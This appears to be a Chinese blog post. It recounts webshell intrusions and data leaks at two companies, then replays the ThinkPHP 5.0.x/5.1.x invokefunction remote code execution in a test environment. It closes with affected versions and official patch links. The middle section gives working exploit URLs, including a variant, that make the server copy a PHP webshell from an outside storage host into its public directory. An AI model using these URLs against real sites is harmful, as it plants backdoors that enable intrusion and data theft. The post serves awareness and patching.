背景介绍

在近期一个月内,我身边两个朋友公司(一位是北京朋友,一位是郑州朋友这里简称:小北和小郑)均遭到了网站挂马攻击,当天攻城狮忙活的好不热乎,攻击后发生的神秘事情便是,具小北描述:1.首先网站百度推广的链接点击后跳赌博网站;2.站内十几万学员信息泄露。

另外一位朋友小郑自己的广告公司,累计一年多的客户信息被脱库(纳尼(ÒωÓױ)!一年多的数据),如果是同行的恶意竞争这损失你自己琢磨吧,朋友这边除了一边修复问题,同时也收集证据信息,并已提交立案!!!

因为隐私关系,我不再这里透漏截图如果感情兴趣,可以在这里观看视频。

接下来带你重放攻击现场,在正式开映前为了不增加后面的复杂度,我们下来补习一下类似1+1=?的问题,

涨姿势时间

首先看俩 URL http://www.test.com/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=https://test-attack.oss-cn-beijing.aliyuncs.com/php/dm.txt&vars[1][]=t.php

模拟现场

环境版本:thinkphp_5.0.22 虚拟域名:http://tp5.test.com/

效果图

tp5.png

远程执行命令:http://tp5.test.com/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=https://test-attack.oss-cn-beijing.aliyuncs.com/php/dm.txt&vars[1][]=t.php

还有其他的变种写法,如:http://tp5.test.com/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][0]=https://test-attack.oss-cn-beijing.aliyuncs.com/php/dm.js&vars[1][1]=/data/www/thinkphp_5.0.22/public/t2.php

执行后页面提示:页面错误!请稍后再试~,如果你真的以为啥也没有发生,那你就是真是 Too young too simple!!,打开你的项目 public 目录,你会欣喜的发现多了俩文件 t.phpt2.php,没错这俩就是 PHP 大马。接下来访问这俩大马文件,就可以开启一路狂飙模式。

上图说话

t1.png

t2.png

修复补丁

漏洞影响版本为

  • ThinkPHP 5.0.5-5.0.22
  • ThinkPHP 5.1.0-5.1.30

官方也在5.0.24的更新说明中给出了安全更新公告。

Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

类似文章